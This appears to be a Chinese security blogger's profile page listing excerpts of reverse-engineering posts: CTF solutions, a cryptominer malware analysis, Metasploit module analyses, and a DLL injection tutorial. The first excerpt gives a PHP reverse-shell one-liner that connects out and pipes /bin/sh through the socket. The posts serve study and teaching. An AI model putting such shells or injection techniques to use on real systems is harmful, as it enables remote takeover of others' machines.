3 Cosmop01itan

尚未进行身份认证

暂无相关描述

等级
博文 155
排名 2w+

php reverseShell

<?php$sock=fsockopen($ip,$port);$descriptorspec=array(0=>$sock,1=>$sock,2=>$sock);$process=proc_open('/bin/sh',$descriptorspec,$pipes);proc_c...

2019-06-12 20:01:24

南邮逆向xor题解

ida反编译:调用了6个函数对输入的字符串进行了加密,进入func1看看:对输入的57个字符进行了xor接下来进入xfun1:很明显对前10个进行了xor,后面的函数几个同理。接下来写python脚本解密:data=[0x15,0x1F,0x12,0x14,0x08,0x3A,0x46,0x2C,0x07,0x1B,0x51,0x13,0x3F,0x57,0x08,0x05,0x3F,...

2019-06-10 16:24:57

c#动态修改代码的crackme

题目运行截图用exeinfo看下有没有混淆:拉进dnSpy反编译:进btnCheck_Click单击过程看下:里面调用了Form1.MetMetMet()函数:在这个函数里面动态生成了一个MetM函数,用form.bb数组里面的内容来填充函数内容,实际上这个MetM才是验证函数那我们要把这个函数修复,动态调试把bb数组的内容复制出来,将MetMett函数的内容替换为bb数组的内...

2019-05-27 22:15:04

linux migrations病毒守付进程分析

首先看main函数进入background()函数相当于fork了新的进程,然后父进程退出,由子进程来执行进入checkmsgger()函数先检查是否存在/etc/httpdz文件,这是个后门文件,下一篇会分析,如果没有,他会在initfiles()函数里下载到机器上执行进入initfiles()函数它先检查是不是root用户,是的话就下载到/etc/initdz,不...

2019-05-16 11:05:37

initdz linux挖坑病毒分析

拉进ida里面反编译一下函数名很清晰,看来是没有去掉符号信息进入checkhost()里面也很清楚,选择一个存活的域名作为baseurl,后面有用到来下载挖坑程序进入checkzigw()函数删除同类的挖坑软件,详细说一下,先pkillzigw进程,改变zigw的属性为可见可修改,使用rm-rf/etc/zigw删除zigw进入initfile()函数,这个函数比较...

2019-05-09 20:00:03

逆向python生成的可执行文件

先安装pyinstallerpipinstallpyinstaller-ihttps://pypi.douban.com/simpl写一个简单的脚本:print'hello,world'pyinstaller基本用法,常用的可选参数如下:--onefile将结果打包成一个可执行文件--onedir将所有结果打包到一个文件夹中,该文件夹包括一个可执行文件和可执行文件执...

2019-05-08 20:20:50

*ctf 逆向math题解

ida反编译一下部分方程(20flag[0]+10flag[1]+12flag[2]+23flag[3]+25flag[4]+12flag[5]+17flag[6]+9flag[7]+6flag[8]+6flag[9]+7flag[10]+20flag[11]+0flag[12]+8flag[13]+15flag[14]+13flag[15]+15flag[16]+1flag[17]+0...

2019-04-24 21:35:32

2019信安国赛逆向easyGo,bbvvmm题解

0x00Reverse–easyGo操作内容:|拖入ida反编译,发现很难识别,google之后,发现解析go符号的idapy脚本https://raw.githubusercontent.com/strazzere/golang_loader_assist/master/golang_loader_assist.py执行之后识别出了main函数,在main函数里面找00000004...

2019-04-23 10:42:10

*ctf box题解

题目给了源码/**main.c*Copyright(C)2019hzshang<hzshang15@gmail.com>**DistributedundertermsoftheMITlicense.*/#include<stdio.h>#include<stdlib.h>#include<str...

2019-04-17 14:24:15

ctf之py反编译求p*q%n==1

拿到一个pyc反编译,分析了一下,要求t1,t2,t3fromflagimportt1,t2,t3N=91080783459224114417419735848141602413276894709356670475166857901383529276788422992031159Ls1=11411269144987772222786703496950992585276983...

2019-04-17 11:13:01

FSG2.0脱壳记录

想要加壳文件的可以评论留言。。1.现用PEId查一下壳,发现是FSG压缩壳2.载入od,是fsg的入口特征3.od往下到jmpdwordptr:[ebx+0xc],下断点4.F9运行,执行到jmp,跳转到这里5.到oep,删除模块分析6.后面用LordPedump,ImportREC修复导入表,这里不再赘述。...

2019-04-04 22:19:57

c/c++字符串混淆工具

python3写的一个工具,欢迎star:https://github.com/lxwAsm/myprojects/tree/master/python/CppStringConfusion

2019-03-26 14:31:21

go base64

import( b64"encoding/base64" "fmt")funcmain(){ s:="12345" enc:=b64.StdEncoding.EncodeToString([]byte(s)) fmt.Println(enc) plain,_:=b64.StdEncoding.DecodeString(enc) fmt.Println(plain) fm...

2019-03-20 00:29:27

go sha1

import"crypto/sha1"import"fmt"funcmain(){ s:="thisisastring" h:=sha1.New() h.Write([]byte(s)) bs:=h.Sum(nil) fmt.Println(bs) fmt.Printf("%x\n",bs)}output:[811171462231432365...

2019-03-20 00:16:52

msf killav.rb分析

###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://github.com/rapid7/metasploit-framework##require'set'classMetasploitModule<Msf::Postdefi...

2019-03-10 12:52:49

win7 32位下实现远程线程注入

dllmain.cpp生成注入的dll//dllmain.cpp:定义DLL应用程序的入口点。#include"stdafx.h"#include<Windows.h>#define PROCESS_NAME "notepad.exe"HINSTANCE hMod;HHOOK hHook;HWND hWnd;BOOLAPIENTRYDllMain(...

2019-03-10 10:57:32

msf MessageBox后渗透模块编写

message_box.rb###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://github.com/rapid7/metasploit-framework##classMetasploitModule<Msf::Postinclud...

2019-03-08 12:39:57

msf download_exec模块源码分析

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/download_exec.rb###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://...

2019-03-08 09:57:21

msf渗透脚本之交换鼠标左右功能

swap.rb###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://github.com/rapid7/metasploit-framework##classMetasploitModule<Msf::PostincludeMsf::...

2019-03-07 15:27:41

aliyun服务器安装git,g++

1.更新yum源为aliyunwget-O/etc/yum.repos.d/CentOS-Base.repohttp://mirrors.aliyun.com/repo/Centos-6.repoyummakecache//更新缓存2yuminstall-ygit//安装git3.yuminstallgcc-c++//安装g++...

2019-02-27 10:23:48
奖章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周上午根据用户上周的博文发布情况由系统自动颁发。